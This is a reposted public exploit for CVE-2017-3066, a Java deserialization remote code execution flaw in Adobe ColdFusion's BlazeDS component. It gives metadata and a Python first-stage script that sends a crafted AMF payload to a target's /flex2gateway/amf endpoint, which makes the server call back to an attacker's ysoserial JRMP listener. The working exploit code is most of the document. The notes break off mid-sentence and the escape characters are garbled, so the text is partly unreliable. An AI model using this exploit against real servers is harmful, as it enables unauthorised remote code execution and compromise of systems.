[CVE-2017-3066]Adobe Coldfusion BlazeDS Java反序列化漏洞

Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
Date: February 6, 2018
Exploit Author: Faisal Tameesh (@DreadSystems)
Company: Depth Security (https://depthsecurity.com)
Version: Adobe Coldfusion (11.0.03.292866)
Tested On: Windows 10 Enterprise (10.0.15063)
CVE: CVE-2017-3066
Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
Category: remote

Notes:
This is a two-stage deserialization exploit. The code below is the first stage.
You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
After firing this exploit, and once the target server connects back,

Payload:

import struct import sys import requests  if len(sys.argv) != 5: print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port" quit()  target_IP = sys.argv[1] target_port = sys.argv[2] callback_IP = sys.argv[3] callback_port = sys.argv[4]  amf_payload = '/x00/x03/x00/x00/x00/x01/x00/x00/x00/x00/xff/xff/xff/xff/x11/x0a' + / '/x07/x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + / struct.pack('>I', int(callback_port)) + / '/xf9/x6a/x76/x7b/x7c/xde/x68/x4f/x76/xd8/xaa/x3d/x00/x00/x01/x5b/xb0/x4c/x1d/x81/x80/x01/x00';  url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf" headers = {'Content-Type': 'application/x-amf'} response = requests.post(url, headers=headers, data=amf_payload, verify=False) 

Referers:
http://www.bugsearch.net/en/19652/adobe-coldfusion-11003292866-blazeds-java-object-deserialization-remote-code-execution.html?ref=3